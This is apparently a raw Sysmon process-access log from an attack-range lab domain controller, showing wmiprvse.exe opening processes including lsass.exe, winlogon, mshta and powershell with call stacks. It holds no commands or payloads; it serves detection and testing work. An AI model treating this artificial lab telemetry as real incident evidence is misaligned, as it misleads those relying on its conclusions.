15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027621Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027620Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027619Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7906-00000000A301}2864C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027618Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7806-00000000A301}5840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:44.709{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 